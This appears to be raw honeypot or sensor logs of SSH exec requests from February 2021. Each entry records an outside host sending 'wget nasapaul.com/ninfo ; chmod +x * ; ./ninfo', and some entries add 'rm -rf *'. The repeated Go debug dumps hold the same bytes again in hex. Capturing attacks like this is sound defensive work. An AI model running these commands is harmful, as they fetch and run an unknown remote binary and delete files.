nasapaul security event raw logs
12:22:55.220 services ▶ DEBU 6472 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000f48000] 0} 0xc000efa960 {0 0} 0xc000efaa80 0xc000efaf60 0xc000e9c300 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000e95440) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000e953e0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000433110 {0 0 0 <nil> <nil>} 824633927792}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032880 0xc000e99a20 0xc000e99a20 false}) %!s(*ssh.buffer=&{0xc000032900 0xc000e99a60 0xc000e99a60 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) Alscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf * | |
services > ssh > category=ssh, date=2021-02-14 12:22:55.22099094 +0000 UTC m=+1345163.502386732, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=167.99.253.119, source-port=49642, ssh.exec=[]string{"lscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x41, 0x6c, 0x73, 0x63, 0x70, 0x75, 0x20, 0x3b, 0x20, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x72, 0x6d, 0x20, 0x2d, 0x72, 0x66, 0x20, 0x2a}, ssh.request-type=exec, ssh.sessionid=c0khc7gk9kn000dnacu0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
12:26:30.497 services ▶ DEBU 64db Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000938000] 0} 0xc00006b080 {0 0} 0xc00006b1a0 0xc00006b2c0 0xc000032080 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d6420) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d63c0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000482820 {0 0 0 <nil> <nil>} 824649040496}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c280 0xc00115ee00 0xc00115ee00 false}) %!s(*ssh.buffer=&{0xc000e9c2c0 0xc00115ef20 0xc00115ef20 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) Alscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf * | |
services > ssh > category=ssh, date=2021-02-14 12:26:30.49813889 +0000 UTC m=+1345378.779534691, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=167.99.253.119, source-port=45348, ssh.exec=[]string{"lscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x41, 0x6c, 0x73, 0x63, 0x70, 0x75, 0x20, 0x3b, 0x20, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x72, 0x6d, 0x20, 0x2d, 0x72, 0x66, 0x20, 0x2a}, ssh.request-type=exec, ssh.sessionid=c0khdt8k9kn000dnadb0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
15:00:09.483 services ▶ DEBU 6aac Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000dee000] 0} 0xc000e955c0 {0 0} 0xc000e956e0 0xc000e95740 0xc000e9c200 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d65a0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6540) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc001148b20 {0 0 0 <nil> <nil>} 824633927088}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc0000325c0 0xc000e984e0 0xc000e984e0 false}) %!s(*ssh.buffer=&{0xc000032600 0xc000e98520 0xc000e98520 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-15 15:00:09.484309044 +0000 UTC m=+1440997.765704822, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=64.225.101.223, source-port=52828, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0l8ou0k9kn000dnaj7g, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
15:04:27.762 services ▶ DEBU 6b11 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000ae0840 {{0 0} [0xc001016480] 0} 0xc0011d7260 {0 0} 0xc0011d72c0 0xc0011d7320 0xc000e9cb80 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efb560) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efb500) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0011486f8 {0 0 0 <nil> <nil>} 824633929008}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032d40 0xc000e99940 0xc000e99940 false}) %!s(*ssh.buffer=&{0xc000032d80 0xc000e99980 0xc000e99980 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-15 15:04:27.762821171 +0000 UTC m=+1441256.044216965, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=64.225.101.223, source-port=60866, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0l8qugk9kn000dnajk0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
00:52:49.380 services ▶ DEBU 6ce9 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc0000ba240] 0} 0xc0011d6840 {0 0} 0xc0011d69c0 0xc0011d6a20 0xc0000325c0 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efa4e0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efa360) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000039370 {0 0 0 <nil> <nil>} 824649040368}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c200 0xc000e98540 0xc000e98540 false}) %!s(*ssh.buffer=&{0xc000e9c240 0xc000e98580 0xc000e98580 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 00:52:49.381412233 +0000 UTC m=+1476557.662808034, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=50930, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lheo0k9kn000dnalfg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
00:52:50.686 services ▶ DEBU 6cee Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de160 {{0 0} [0xc000e52180] 0} 0xc0011d6fc0 {0 0} 0xc0011d7020 0xc0011d70e0 0xc0000327c0 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d71a0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d7140) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000482f90 {0 0 0 <nil> <nil>} 824633927792}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032880 0xc0011fe9c0 0xc0011fe9c0 false}) %!s(*ssh.buffer=&{0xc000032900 0xc0011fea00 0xc0011fea00 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 00:52:50.686498457 +0000 UTC m=+1476558.967894237, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=56258, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lheo8k9kn000dnalg0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
00:52:58.117 services ▶ DEBU 6cf3 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000dee000 {{0 0} [0xc0000ba540] 0} 0xc000efade0 {0 0} 0xc000efae40 0xc000efaea0 0xc000e9c500 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efafc0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efaf60) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000039fe8 {0 0 0 <nil> <nil>} 824649041328}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c5c0 0xc000e98d80 0xc000e98d80 false}) %!s(*ssh.buffer=&{0xc000e9c600 0xc000e98de0 0xc000e98de0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 00:52:58.117645982 +0000 UTC m=+1476566.399041785, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=59120, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lheq8k9kn000dnalgg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
00:52:59.349 services ▶ DEBU 6cf8 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de580 {{0 0} [0xc000e523c0] 0} 0xc000efb380 {0 0} 0xc000efb3e0 0xc000efb440 0xc000e9c700 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d7560) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d7500) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0004326e8 {0 0 0 <nil> <nil>} 824633929392}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032ec0 0xc0011feea0 0xc0011feea0 false}) %!s(*ssh.buffer=&{0xc000032f00 0xc0011feee0 0xc0011feee0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 00:52:59.349959932 +0000 UTC m=+1476567.631356102, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=35994, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lheqgk9kn000dnalh0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
00:53:26.631 services ▶ DEBU 6cfd Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000dee160 {{0 0} [0xc0000ba900] 0} 0xc0011d76e0 {0 0} 0xc0011d7740 0xc0011d77a0 0xc000033100 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efb980) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efb860) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000e91680 {0 0 0 <nil> <nil>} 824649042672}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9cb00 0xc000e99880 0xc000e99880 false}) %!s(*ssh.buffer=&{0xc000e9cb40 0xc000e998c0 0xc000e998c0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 00:53:26.632099423 +0000 UTC m=+1476594.913495286, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=59004, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhf18k9kn000dnalhg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
00:53:29.019 services ▶ DEBU 6d02 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000dee2c0 {{0 0} [0xc000e52600] 0} 0xc0011d7860 {0 0} 0xc0011d78c0 0xc0011d7920 0xc000033240 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d7a40) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d7980) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000433468 {0 0 0 <nil> <nil>} 824633930544}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000033340 0xc0011ff720 0xc0011ff720 false}) %!s(*ssh.buffer=&{0xc000033380 0xc0011ff760 0xc0011ff760 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 00:53:29.019387375 +0000 UTC m=+1476597.300783158, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=41322, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhf20k9kn000dnali0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
00:53:30.330 services ▶ DEBU 6d07 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de6e0 {{0 0} [0xc0000bac00] 0} 0xc0011d7e00 {0 0} 0xc0011d7e60 0xc0011d7ec0 0xc000033480 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efbf80) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efbf20) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0011486f8 {0 0 0 <nil> <nil>} 824649043760}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9cf40 0xc000e99f60 0xc000e99f60 false}) %!s(*ssh.buffer=&{0xc000e9cf80 0xc000e99fa0 0xc000e99fa0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 00:53:30.330822166 +0000 UTC m=+1476598.612217958, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=46912, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhf28k9kn000dnalig, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
00:53:32.568 services ▶ DEBU 6d0c Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de840 {{0 0} [0xc0000bad80] 0} 0xc00006be00 {0 0} 0xc00006bec0 0xc00006bf20 0xc000033640 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000e94720) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000e94360) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc001149468 {0 0 0 <nil> <nil>} 824649044464}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9d200 0xc001151c00 0xc001151c00 false}) %!s(*ssh.buffer=&{0xc000e9d240 0xc001151d40 0xc001151d40 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 00:53:32.568412599 +0000 UTC m=+1476600.849808398, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=56648, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhf2ok9kn000dnalj0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
01:19:33.077 services ▶ DEBU 6fe9 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000e52420 {{0 0} [0xc0009c0480] 0} 0xc0011d7a40 {0 0} 0xc0011d7aa0 0xc0011d7b00 0xc000032d40 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d7bc0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d7b60) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000039d28 {0 0 0 <nil> <nil>} 824633929200}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032e00 0xc0011fec20 0xc0011fec20 false}) %!s(*ssh.buffer=&{0xc000032e40 0xc0011fec60 0xc0011fec60 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 01:19:33.077819662 +0000 UTC m=+1478161.359215439, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=38310, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhr90k9kn000dnaoeg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
01:19:41.604 services ▶ DEBU 6ff2 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de9a0 {{0 0} [0xc0009c0780] 0} 0xc00006bda0 {0 0} 0xc00006be00 0xc00006bec0 0xc000033200 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc00006bf80) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc00006bf20) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0004827e0 {0 0 0 <nil> <nil>} 824633930416}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc0000332c0 0xc0011ff500 0xc0011ff500 false}) %!s(*ssh.buffer=&{0xc000033300 0xc0011ff540 0xc0011ff540 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 01:19:41.605220152 +0000 UTC m=+1478169.886615964, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=46416, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhrb0k9kn000dnaofg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
